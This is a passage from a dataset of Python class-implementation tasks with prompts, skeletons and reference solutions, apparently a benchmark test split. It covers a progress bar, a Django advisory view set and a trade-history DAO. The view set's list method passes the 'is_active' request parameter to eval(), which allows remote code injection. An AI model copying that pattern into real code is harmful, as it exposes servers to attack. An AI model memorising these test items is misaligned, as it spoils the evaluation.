* (self.param.width - percent))[:self.param.width]}] \"\nelse:\n msg = f'{current}/Unknown '\ntime_diff = time.time() - self.param.time\nif self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nelse:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nif values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\nif self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelse:\n self.param.logger.info(msg + ' ' * 4, enter=True)"], "bodies_text": "<|body_start_0|>\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' 
* (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_2|>\n", "class_docstring": "Displays a progress bar.", "class_name": "Progbar", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n <|body_0|>\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_1|>\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' 
* (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000366", "length_bytes": 4106, "license_type": "permissive", "methods": [{"docstring": "Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").", "name": "__init__", "signature": "def __init__(self, target, width=25, verbose=1, unit_name='step')"}, {"docstring": "Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).", "name": "add", "signature": "def add(self, current, values=None)"}, {"docstring": "Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).", "name": "update", "signature": "def update(self, current, values=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_test_000183", "prompt": "Implement the Python class `Progbar` described below.\n\nClass description:\nDisplays a progress bar.\n\nMethod signatures and docstrings:\n- def __init__(self, target, width=25, verbose=1, unit_name='step'): Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\n- def add(self, current, values=None): Args: current: add Index of current step, current += current. 
values: List of tuples: (name, value_for_last_step).\n- def update(self, current, values=None): Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).", "prompted_full_text": "Implement the Python class `Progbar` described below.\n\nClass description:\nDisplays a progress bar.\n\nMethod signatures and docstrings:\n- def __init__(self, target, width=25, verbose=1, unit_name='step'): Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\n- def add(self, current, values=None): Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\n- def update(self, current, values=None): Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\n\n<|skeleton|>\nclass Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n <|body_0|>\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_1|>\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' 
* (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n<|end_body_2|>\n", "revision_id": "dbaab809939d3af52c6d57b6df0553ea18024bf4", "skeleton": "<|skeleton|>\nclass Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n <|body_0|>\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_1|>\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Progbar:\n \"\"\"Displays a progress bar.\"\"\"\n\n def __init__(self, target, width=25, verbose=1, unit_name='step'):\n \"\"\"Args: target: Total number of steps expected, None if unknown. width: Progress bar width on screen. 
verbose: Verbosity mode, 0 (silent), 1 (verbose) unit_name: Display name for step counts (usually \"step\" or \"sample\").\"\"\"\n self.param = Config()\n self.param.width = width\n self.param.target = target\n self.param.time = time.time()\n self.param.n = 0\n self.param.unit_name = unit_name\n self.param.verbose = verbose\n self.param.current = 0\n if verbose:\n self.param.logger = Logger()\n\n def add(self, current, values=None):\n \"\"\"Args: current: add Index of current step, current += current. values: List of tuples: (name, value_for_last_step).\"\"\"\n if not self.param.verbose:\n return 0\n self.param.n += 1\n self.param.current += current\n if self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' 
* (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n", "source": "the_stack_v2_python_sparse", "source_path": "linora/utils/_progbar.py", "source_repo": "Hourout/linora", "split": "test", "star_events_count": 11} {"blob_id": "ad3e822a848fb09cb289c5f4a5df3359ac7a962e", "bodies": ["if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\nelif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\nreturn tuple()", "queryset = self.get_queryset()\nqueryset = filter_queryset_permission(queryset, request, self.get_permissions())\nqueryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\nqueryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\ntry:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\nexcept ValueError:\n queryset = None\nqueryset = limit_queryset(queryset, request)\nserializer = self.get_serializer(queryset, many=True)\nreturn Response(serializer.data)"], "bodies_text": "<|body_start_0|>\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n<|end_body_1|>\n", "class_docstring": "Advisory view set", "class_name": "AdvisoryViewSet", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def get_permissions(self):\n \"\"\"Get permissions\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n 
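The Progbar record above formats its status line from the completion rate, a fixed-width `=`/`>`/`.` bar, and the elapsed time. Its `Config` and `Logger` helpers live outside the record, so this hedged sketch drops them and returns the message directly; the record's 'EAT' label is written out here as an estimated remaining time:

```python
import time

def progress_message(current, target, start_time, width=25,
                     unit_name='step', steps_done=1):
    # steps_done mirrors the record's self.param.n (number of update calls).
    if target is not None:
        current = min(current, target)          # clamp, as the record does
        rate = current / target
        filled = int(rate * width)
        bar = ('=' * filled + '>' + '.' * (width - filled))[:width]
        msg = f'{current}/{target} [{bar}] '
    else:
        msg = f'{current}/Unknown '
    elapsed = time.time() - start_time
    if target is not None and current < target:
        remaining = int(elapsed / current * (target - current)) if current else 0
        msg += f'- {rate * 100:.1f}% ETA: {remaining}s'
    else:
        msg += f'- {int(elapsed / steps_done * 1000)}ms/{unit_name}'
    return msg

start = time.time() - 10.0  # pretend 10 seconds have elapsed
# Roughly: 40/100 [==========>..............] - 40.0% ETA: 15s
print(progress_message(40, 100, start))
```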
<|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000367", "length_bytes": 27778, "license_type": "permissive", "methods": [{"docstring": "Get permissions", "name": "get_permissions", "signature": "def get_permissions(self)"}, {"docstring": "List advisories", "name": "list", "signature": "def list(self, request, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005598", "prompt": "Implement the Python class `AdvisoryViewSet` described below.\n\nClass description:\nAdvisory view set\n\nMethod signatures and docstrings:\n- def get_permissions(self): Get permissions\n- def list(self, request, *args, **kwargs): List advisories", "prompted_full_text": "Implement the Python class `AdvisoryViewSet` described below.\n\nClass description:\nAdvisory view set\n\nMethod signatures and docstrings:\n- def get_permissions(self): Get permissions\n- def list(self, request, *args, **kwargs): List advisories\n\n<|skeleton|>\nclass AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def get_permissions(self):\n \"\"\"Get permissions\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n<|end_body_1|>\n", "revision_id": "cf429f43251ad7e77c0d9bc9fe91bb030ca8bae8", "skeleton": "<|skeleton|>\nclass AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def 
get_permissions(self):\n \"\"\"Get permissions\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def get_permissions(self):\n \"\"\"Get permissions\"\"\"\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "membership/views.py", "source_repo": "810Teams/clubs-and-events-backend", "split": "test", "star_events_count": 3} {"blob_id": "df5d2e0541397e5c8c6863ced056aa9a5711873f", "bodies": ["query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\nif start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\nif end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\nif mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\nif page == -1:\n return query.all()\nif not page or page == '' or page == 'undefined':\n page = 1\nreturn Pagination(query=query, page=page)", "query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\nif start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\nif end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\nif mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\nsum_list = []\nprofit_sum = 0\nstorage_sum = 0\nc_commission_sum = 0\nprofitraw_sum = 0\nfor obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\nsum_list.append({'profit_sum': str(profit_sum), 
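The AdvisoryViewSet record above treats an advisory as active when today falls inside its [start_date, end_date] window, and parses the `is_active` query parameter with `eval()`. In this hedged plain-Python sketch the queryset is replaced by a list of dicts and the `eval()` call by an explicit string comparison — both deliberate substitutions, not the record's own code:

```python
from datetime import date

def parse_bool(raw):
    # Explicit stand-in for the record's eval(query): accept common truthy
    # spellings a frontend might send, otherwise report "not provided".
    if raw is None:
        return None
    return raw.lower() in ('true', '1')

def split_by_activity(advisories, today=None):
    today = today or date.today()
    active, inactive = [], []
    for a in advisories:
        bucket = active if a['start_date'] <= today <= a['end_date'] else inactive
        bucket.append(a)
    return active, inactive

advisories = [
    {'id': 1, 'start_date': date(2024, 1, 1), 'end_date': date(2024, 2, 1)},
    {'id': 2, 'start_date': date(2023, 1, 1), 'end_date': date(2023, 2, 1)},
]
active, inactive = split_by_activity(advisories, today=date(2024, 1, 15))
assert [a['id'] for a in active] == [1] and [a['id'] for a in inactive] == [2]
assert parse_bool('True') is True and parse_bool(None) is None
```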
'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\nreturn sum_list"], "bodies_text": "<|body_start_0|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n return Pagination(query=query, page=page)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n<|end_body_1|>\n", "class_docstring": "v_tradehistory视图操作", "class_name": "VTradehistoryDao", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n <|body_0|>\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 
